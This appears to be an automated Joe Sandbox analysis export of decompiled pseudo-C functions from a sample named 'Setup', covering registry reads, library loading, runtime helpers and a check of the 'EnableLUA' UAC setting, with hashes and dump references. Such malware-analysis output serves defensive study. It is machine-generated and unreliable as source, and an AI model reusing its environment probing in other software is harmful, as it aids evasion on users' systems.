                                                                                                                                                              			E004E7470(intOrPtr __ecx, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
				void* _v8;
				intOrPtr _v12;
				long _t13;
				long _t16;

				_v12 = __ecx;
				_t13 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t13 == 0) {
					_t16 = RegQueryValueExW(_v8, _a12, 0,  &_a16, _a20,  &_a24); // executed
					if(_t16 == 0) {
						RegCloseKey(_v8);
						return 1;
					}
					RegCloseKey(_v8);
					return 0;
				}
				return 0;
			}







                                                                                                                                                              0x004e7476
                                                                                                                                                              0x004e748c
                                                                                                                                                              0x004e7494
                                                                                                                                                              0x004e74b0
                                                                                                                                                              0x004e74b8
                                                                                                                                                              0x004e74cc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004e74d2
                                                                                                                                                              0x004e74be
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004e74c4
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExW.KERNEL32(?,00000104,00000000,00020019,00000104,?,00000104), ref: 004E748C
                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,?,?), ref: 004E74B0
                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004E74BE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                              • Opcode ID: 74fe9954f2e3551657335ec8724b267966786377028bdac5330b8d3bf33c2527
                                                                                                                                                              • Instruction ID: 76fb4871da12695b8ab536f07709f3c59ad994e195b5bc8f38fb2a09462755e2
                                                                                                                                                              • Opcode Fuzzy Hash: 74fe9954f2e3551657335ec8724b267966786377028bdac5330b8d3bf33c2527
                                                                                                                                                              • Instruction Fuzzy Hash: E0012C7560420CFBDB00DFA5D849EEB7B7CAB48701F108549FA1597281D634DA09EBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00433110 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00433110(intOrPtr __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr* _t21;

				_push(__ecx);
				_v8 = __ecx;
				E00433190(_v8, __eflags,  *((intOrPtr*)(E0041D410(_v8)))); // executed
				 *((intOrPtr*)(E0041D410(_v8))) =  *((intOrPtr*)(_v8 + 4));
				 *((intOrPtr*)(_v8 + 8)) = 0;
				 *((intOrPtr*)(E00433680(_v8))) =  *((intOrPtr*)(_v8 + 4));
				_t21 = E00433720(_v8);
				 *_t21 =  *((intOrPtr*)(_v8 + 4));
				return _t21;
			}





                                                                                                                                                              0x00433113
                                                                                                                                                              0x00433114
                                                                                                                                                              0x00433125
                                                                                                                                                              0x00433138
                                                                                                                                                              0x0043313d
                                                                                                                                                              0x00433152
                                                                                                                                                              0x00433157
                                                                                                                                                              0x00433162
                                                                                                                                                              0x00433167

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2519475695-0
                                                                                                                                                              • Opcode ID: 65b7eaa97be12373fd54e7420ed281a64986922b202126f24e156f9667a216b2
                                                                                                                                                              • Instruction ID: 635f2393350e1471a32329ed3b593f6587da4dc9454c402d12225df5114d51ca
                                                                                                                                                              • Opcode Fuzzy Hash: 65b7eaa97be12373fd54e7420ed281a64986922b202126f24e156f9667a216b2
                                                                                                                                                              • Instruction Fuzzy Hash: 2EF03974A00108EFCB08DF95D69295DB7F5AF89308B2181ADD4095B365DB35AF01DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00451EC5 Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E00451EC5(long _a4) {
				void* _t6;
				void* _t9;
				void* _t10;

				_t11 =  *0x51d710;
				if( *0x51d710 != 0 && E0045B680(_t11, 0x51d710) != 0) {
					 *0x51d710();
				}
				if(E00457387(_t6) != 0) {
					E00457549(_t6, _t9, _t10, _t2); // executed
				}
				ExitThread(_a4);
			}






                                                                                                                                                              0x00451eca
                                                                                                                                                              0x00451ed1
                                                                                                                                                              0x00451ee2
                                                                                                                                                              0x00451ee2
                                                                                                                                                              0x00451eef
                                                                                                                                                              0x00451ef2
                                                                                                                                                              0x00451ef7
                                                                                                                                                              0x00451efb

                                                                                                                                                              APIs
                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00451ED8
                                                                                                                                                                • Part of subcall function 0045B680: __FindPESection.LIBCMT ref: 0045B6DB
                                                                                                                                                              • __getptd_noexit.LIBCMT ref: 00451EE8
                                                                                                                                                              • __freeptd.LIBCMT ref: 00451EF2
                                                                                                                                                              • ExitThread.KERNEL32 ref: 00451EFB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3182216644-0
                                                                                                                                                              • Opcode ID: 45c0064a665edcd0f35b4145ff4f6929edeaa6cdf4a60e7216190a0d6abc93e0
                                                                                                                                                              • Instruction ID: f95b2b2071df862fdbd7455a2c00a2e548bf6b304d09f826b41b5fb9907c16d8
                                                                                                                                                              • Opcode Fuzzy Hash: 45c0064a665edcd0f35b4145ff4f6929edeaa6cdf4a60e7216190a0d6abc93e0
                                                                                                                                                              • Instruction Fuzzy Hash: 65D012211402155AD71127A6EC4FB6B3AA9EB50357B044A26BC11815F3DF78C88CD579
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004D2C30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                              			E004D2C30(intOrPtr __ebx, void* __ecx, intOrPtr __edi, intOrPtr __esi, void* __eflags, signed int _a4, intOrPtr _a8) {
				WCHAR* _v8;
				char _v16;
				WCHAR* _v20;
				signed int _v24;
				char _v542;
				short _v544;
				char _v576;
				char _v577;
				char _v608;
				WCHAR* _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				signed int _t46;
				signed int _t47;
				WCHAR* _t55;
				signed char _t62;
				short _t66;
				signed int _t117;

				_t116 = __esi;
				_t115 = __edi;
				_t77 = __ebx;
				_push(0xffffffff);
				_push(0x50dedf);
				_push( *[fs:0x0]);
				_t46 =  *0x561244; // 0xddd124f9
				_t47 = _t46 ^ _t117;
				_v24 = _t47;
				_push(_t47);
				 *[fs:0x0] =  &_v16;
				_v20 = 0;
				E004160E0(E004D1B70(__ecx, 2), _a4, 1);
				if((E00416630(_a4 + 4) & 0x000000ff) == 0) {
					_t55 = E004D22E0(__ebx, __edi, __esi, 0); // executed
					_v20 = _t55;
					if(_a8 != 0) {
						if(( *(E004051D0(__ebx, _a4 + 4, __edi, __esi, 0)) & 0x0000ffff) != 0x2a) {
							__eflags = _a4;
							if(_a4 == 0) {
								_v612 = 0;
							} else {
								_v612 = _a4 + 4;
							}
							_v616 = E00409760( &_v608, _a8, _v612);
							_v620 = _v616;
							_v8 = 1;
							E00409880(_a4, __eflags, _v620);
							_v8 = 0xffffffff;
							E004178C0( &_v608);
							_t110 = _a4;
							_t62 = E0049E7E0(_a4, 0); // executed
							__eflags = _t62 & 0x000000ff;
							if((_t62 & 0x000000ff) == 0) {
								__eflags = _a4 + 4;
								E00405140(_a4 + 4);
							}
						} else {
							_t66 =  *0x5346b4; // 0x0
							_v544 = _t66;
							E00451D90(__edi,  &_v542, 0, 0x206);
							E00417A20(__ebx, _a4 + 4, _t115, __esi, 0, 1);
							_t110 =  &_v544;
							if(SearchPathW(0, E00416A30(_a4 + 4), 0, 0x104,  &_v544, 0) == 0) {
								__eflags = _a4 + 4;
								E00405140(_a4 + 4);
							} else {
								E00417910( &_v544, E00434050( &_v577));
								_v8 = 0;
								E004181D0(_a4,  &_v576);
								_v8 = 0xffffffff;
								E004176E0();
							}
						}
						if((E00416630(_a4 + 4) & 0x000000ff) != 0) {
							_v20 = 0;
						}
					}
				}
				 *[fs:0x0] = _v16;
				_t44 =  &_v24; // 0x4d2f4a
				return E0044F6C8(_v20, _t77,  *_t44 ^ _t117, _t110, _t115, _t116);
			}





















                                                                                                                                                              0x004d2c30
                                                                                                                                                              0x004d2c30
                                                                                                                                                              0x004d2c30
                                                                                                                                                              0x004d2c33
                                                                                                                                                              0x004d2c35
                                                                                                                                                              0x004d2c40
                                                                                                                                                              0x004d2c47
                                                                                                                                                              0x004d2c4c
                                                                                                                                                              0x004d2c4e
                                                                                                                                                              0x004d2c51
                                                                                                                                                              0x004d2c55
                                                                                                                                                              0x004d2c5b
                                                                                                                                                              0x004d2c74
                                                                                                                                                              0x004d2c89
                                                                                                                                                              0x004d2c91
                                                                                                                                                              0x004d2c99
                                                                                                                                                              0x004d2ca0
                                                                                                                                                              0x004d2cb9
                                                                                                                                                              0x004d2d71
                                                                                                                                                              0x004d2d75
                                                                                                                                                              0x004d2d85
                                                                                                                                                              0x004d2d77
                                                                                                                                                              0x004d2d7d
                                                                                                                                                              0x004d2d7d
                                                                                                                                                              0x004d2da9
                                                                                                                                                              0x004d2db5
                                                                                                                                                              0x004d2dbb
                                                                                                                                                              0x004d2dcc
                                                                                                                                                              0x004d2dd1
                                                                                                                                                              0x004d2dde
                                                                                                                                                              0x004d2de5
                                                                                                                                                              0x004d2de9
                                                                                                                                                              0x004d2df4
                                                                                                                                                              0x004d2df6
                                                                                                                                                              0x004d2dfb
                                                                                                                                                              0x004d2dfe
                                                                                                                                                              0x004d2dfe
                                                                                                                                                              0x004d2cbf
                                                                                                                                                              0x004d2cbf
                                                                                                                                                              0x004d2cc5
                                                                                                                                                              0x004d2cda
                                                                                                                                                              0x004d2cec
                                                                                                                                                              0x004d2cf3
                                                                                                                                                              0x004d2d17
                                                                                                                                                              0x004d2d64
                                                                                                                                                              0x004d2d67
                                                                                                                                                              0x004d2d19
                                                                                                                                                              0x004d2d32
                                                                                                                                                              0x004d2d37
                                                                                                                                                              0x004d2d48
                                                                                                                                                              0x004d2d4d
                                                                                                                                                              0x004d2d5a
                                                                                                                                                              0x004d2d5a
                                                                                                                                                              0x004d2d6c
                                                                                                                                                              0x004d2e13
                                                                                                                                                              0x004d2e15
                                                                                                                                                              0x004d2e15
                                                                                                                                                              0x004d2e13
                                                                                                                                                              0x004d2ca0
                                                                                                                                                              0x004d2e22
                                                                                                                                                              0x004d2e2a
                                                                                                                                                              0x004d2e37

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004D22E0: _memset.LIBCMT ref: 004D23BC
                                                                                                                                                                • Part of subcall function 004D22E0: GetPrivateProfileStringW.KERNEL32 ref: 004D23E8
                                                                                                                                                              • _memset.LIBCMT ref: 004D2CDA
                                                                                                                                                              • SearchPathW.KERNEL32(00000000,00000000,00000000,00000104,?,00000000,00000000,00000001,?,?,00000000,?,DDD124F9), ref: 004D2D0F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _memset$PathPrivateProfileSearchString
                                                                                                                                                              • String ID: J/M
                                                                                                                                                              • API String ID: 582612538-2554188868
                                                                                                                                                              • Opcode ID: 8c980df8abfcb9912a267a226ee280e353d935216a7ddd34d413122323a99119
                                                                                                                                                              • Instruction ID: 4692963f7d416df05ce02a8c07cd532fa1bfbc1300a29e1f714706a3fff324ba
                                                                                                                                                              • Opcode Fuzzy Hash: 8c980df8abfcb9912a267a226ee280e353d935216a7ddd34d413122323a99119
                                                                                                                                                              • Instruction Fuzzy Hash: AA519470A00218ABEB14EF55CD65BEE7774EF54308F10416EF50A6B3C1DB78AA84CB99
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004953B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 81%
                                                                                                                                                              			E004953B0(void* __eflags) {
				char _v8;
				char _v16;
				char _v24;
				char _v28;
				char _v29;
				char _v30;
				signed int _t19;
				intOrPtr _t26;
				void* _t27;
				void* _t28;
				signed int _t38;

				_push(0xffffffff);
				_push(0x5059f3);
				_push( *[fs:0x0]);
				_t19 =  *0x561244; // 0xddd124f9
				_push(_t19 ^ _t38);
				 *[fs:0x0] =  &_v16;
				E00434E30( &_v24);
				_v8 = 0;
				if((E00494F20(__eflags) & 0x000000ff) == 0) {
					L5:
					_v30 = 0;
					_v8 = 0xffffffff;
					E0041EF60( &_v24);
					_t26 = _v30;
				} else {
					_t27 = E0041EEA0( &_v24, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0x20019); // executed
					if(_t27 != 0) {
						goto L5;
					} else {
						_v28 = 0;
						_t28 = E00429BB0( &_v24, L"EnableLUA",  &_v28); // executed
						if(_t28 != 0 || _v28 != 1) {
							goto L5;
						} else {
							_v29 = 1;
							_v8 = 0xffffffff;
							E0041EF60( &_v24);
							_t26 = _v29;
						}
					}
				}
				 *[fs:0x0] = _v16;
				return _t26;
			}














                                                                                                                                                              0x004953b3
                                                                                                                                                              0x004953b5
                                                                                                                                                              0x004953c0
                                                                                                                                                              0x004953c4
                                                                                                                                                              0x004953cb
                                                                                                                                                              0x004953cf
                                                                                                                                                              0x004953d8
                                                                                                                                                              0x004953dd
                                                                                                                                                              0x004953ee
                                                                                                                                                              0x00495445
                                                                                                                                                              0x00495445
                                                                                                                                                              0x00495449
                                                                                                                                                              0x00495453
                                                                                                                                                              0x00495458
                                                                                                                                                              0x004953f0
                                                                                                                                                              0x00495402
                                                                                                                                                              0x00495409
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0049540b
                                                                                                                                                              0x0049540b
                                                                                                                                                              0x0049541e
                                                                                                                                                              0x00495425
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0049542d
                                                                                                                                                              0x0049542d
                                                                                                                                                              0x00495431
                                                                                                                                                              0x0049543b
                                                                                                                                                              0x00495440
                                                                                                                                                              0x00495440
                                                                                                                                                              0x00495425
                                                                                                                                                              0x00495409
                                                                                                                                                              0x0049545e
                                                                                                                                                              0x00495469

                                                                                                                                                              APIs
                                                                                                                                                              • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 004953D8
                                                                                                                                                                • Part of subcall function 0041EEA0: RegOpenKeyExW.KERNEL32(00000001,?,00000000,00000000,00000000,Software\Microsoft\Internet Explorer\,00000001), ref: 0041EECA
                                                                                                                                                                • Part of subcall function 00429BB0: RegQueryValueExW.KERNEL32(DDD124F9,00000004,00000000,DDD124F9,?,00000004,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System), ref: 00429BE0
                                                                                                                                                              Strings
                                                                                                                                                              • EnableLUA, xrefs: 00495416
                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 004953F5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Iterator_baseIterator_base::_OpenQueryValuestd::_
                                                                                                                                                              • String ID: EnableLUA$Software\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                                                                              • API String ID: 396298244-2158134279
                                                                                                                                                              • Opcode ID: e8424a432b09796e039caeee3fd81409fe03dcfc1f841f83dfc53752b70cbb59
                                                                                                                                                              • Instruction ID: 29ad32eb1deafc1a9237aec2643cf2849c09354840a95a285363a7d82d27e06b
                                                                                                                                                              • Opcode Fuzzy Hash: e8424a432b09796e039caeee3fd81409fe03dcfc1f841f83dfc53752b70cbb59
                                                                                                                                                              • Instruction Fuzzy Hash: CB11D03090064ADBCF01DFA1D902BFFBFB4EB14319F20026EE811622C1EB785A05C796
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0044F76F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                              			E0044F76F(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				char _v16;
				void* _t11;
				signed int _t12;
				intOrPtr* _t16;
				void* _t19;
				void* _t25;
				void* _t26;

				_t26 = __edi;
				_t19 = __ebx;
				while(1) {
					_t11 = E0044FBD9(_t19, _t25, _t26, _a4); // executed
					if(_t11 != 0) {
						break;
					}
					_t12 = E00456FFC(_a4);
					__eflags = _t12;
					if(_t12 == 0) {
						__eflags =  *0x5bc914 & 0x00000001;
						if(( *0x5bc914 & 0x00000001) == 0) {
							 *0x5bc914 =  *0x5bc914 | 0x00000001;
							__eflags =  *0x5bc914;
							E0044F754(0x5bc908);
							E0044FAE5( *0x5bc914, 0x51a041);
						}
						E00417C20(0x5bc908);
						E00456A4C( &_v16, 0x544b88);
						asm("int3");
						_t16 =  &_v16;
						 *(_t16 + 4) =  *(_t16 + 4) & 0x00000000;
						_t9 = _t16 + 8;
						 *_t9 =  *(_t16 + 8) & 0x00000000;
						__eflags =  *_t9;
						 *_t16 = 0x51bc00;
						return _t16;
					} else {
						continue;
					}
					L8:
				}
				return _t11;
				goto L8;
			}










                                                                                                                                                              0x0044f76f
                                                                                                                                                              0x0044f76f
                                                                                                                                                              0x0044f786
                                                                                                                                                              0x0044f789
                                                                                                                                                              0x0044f791
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044f77c
                                                                                                                                                              0x0044f782
                                                                                                                                                              0x0044f784
                                                                                                                                                              0x0044f795
                                                                                                                                                              0x0044f7a1
                                                                                                                                                              0x0044f7a3
                                                                                                                                                              0x0044f7a3
                                                                                                                                                              0x0044f7ac
                                                                                                                                                              0x0044f7b6
                                                                                                                                                              0x0044f7bb
                                                                                                                                                              0x0044f7c0
                                                                                                                                                              0x0044f7ce
                                                                                                                                                              0x0044f7d3
                                                                                                                                                              0x0044f7d4
                                                                                                                                                              0x0044f7d6
                                                                                                                                                              0x0044f7da
                                                                                                                                                              0x0044f7da
                                                                                                                                                              0x0044f7da
                                                                                                                                                              0x0044f7de
                                                                                                                                                              0x0044f7e4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0044f784
                                                                                                                                                              0x0044f794
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • _malloc.LIBCMT ref: 0044F789
                                                                                                                                                                • Part of subcall function 0044FBD9: __FF_MSGBANNER.LIBCMT ref: 0044FBFC
                                                                                                                                                                • Part of subcall function 0044FBD9: __NMSG_WRITE.LIBCMT ref: 0044FC03
                                                                                                                                                                • Part of subcall function 0044FBD9: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00457755,?,00000001,?,?,00457D86,00000018,005444D8,0000000C,00457E17), ref: 0044FC50
                                                                                                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 0044F7AC
                                                                                                                                                                • Part of subcall function 0044F754: std::exception::exception.LIBCMT ref: 0044F760
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap_mallocstd::bad_alloc::bad_allocstd::exception::exception
                                                                                                                                                              • String ID: Pyr
                                                                                                                                                              • API String ID: 3447465555-3752401018
                                                                                                                                                              • Opcode ID: 0054d67c207d4c7568505f88fa2829a4319c9a7d50decf1bb6392ddf8cc42fb3
                                                                                                                                                              • Instruction ID: a2ac23eca041f9d271ebf24056ea33b4297bb616494d032b84d1e5c4886cc8d0
                                                                                                                                                              • Opcode Fuzzy Hash: 0054d67c207d4c7568505f88fa2829a4319c9a7d50decf1bb6392ddf8cc42fb3
                                                                                                                                                              • Instruction Fuzzy Hash: D7F0823190120566FB046722EC17A9A3FA89B4535CB10403FFC0595592DE6DBA4D929D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004251B0 Relevance: 4.6, APIs: 3, Instructions: 56libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                              			E004251B0(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, WCHAR* _a4) {
				signed int _v8;
				short _v532;
				intOrPtr* _v536;
				intOrPtr _v540;
				signed int _t21;
				struct HINSTANCE__* _t29;
				intOrPtr _t31;
				intOrPtr _t36;
				intOrPtr _t48;
				intOrPtr _t49;
				signed int _t50;

				_t49 = __esi;
				_t48 = __edi;
				_t45 = __edx;
				_t36 = __ebx;
				_t21 =  *0x561244; // 0xddd124f9
				_v8 = _t21 ^ _t50;
				_v536 = __ecx;
				if( *(_v536 + 4) == 0) {
					E0045184A( &_v532, _a4);
					 *(PathFindFileNameW( &_v532)) = 0;
					E004250E0( &_v532);
					_t29 = LoadLibraryW(_a4); // executed
					 *(_v536 + 4) = _t29;
					E004250E0(0);
					_t45 = _v536;
					if( *(_v536 + 4) == 0) {
						L5:
						_v540 = 0;
					} else {
						_t45 =  *_v536;
						if(( *((intOrPtr*)( *((intOrPtr*)( *_v536 + 0xc))))() & 0x000000ff) == 0) {
							goto L5;
						} else {
							_v540 = 1;
						}
					}
					_t31 = _v540;
				} else {
					_t31 = 1;
				}
				return E0044F6C8(_t31, _t36, _v8 ^ _t50, _t45, _t48, _t49);
			}














                                                                                                                                                              0x004251b0
                                                                                                                                                              0x004251b0
                                                                                                                                                              0x004251b0
                                                                                                                                                              0x004251b0
                                                                                                                                                              0x004251b9
                                                                                                                                                              0x004251c0
                                                                                                                                                              0x004251c3
                                                                                                                                                              0x004251d3
                                                                                                                                                              0x004251e7
                                                                                                                                                              0x004251fe
                                                                                                                                                              0x00425208
                                                                                                                                                              0x00425214
                                                                                                                                                              0x00425220
                                                                                                                                                              0x00425225
                                                                                                                                                              0x0042522d
                                                                                                                                                              0x00425237
                                                                                                                                                              0x0042525f
                                                                                                                                                              0x0042525f
                                                                                                                                                              0x00425239
                                                                                                                                                              0x0042523f
                                                                                                                                                              0x00425251
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00425253
                                                                                                                                                              0x00425253
                                                                                                                                                              0x00425253
                                                                                                                                                              0x00425251
                                                                                                                                                              0x00425269
                                                                                                                                                              0x004251d5
                                                                                                                                                              0x004251d5
                                                                                                                                                              0x004251d5
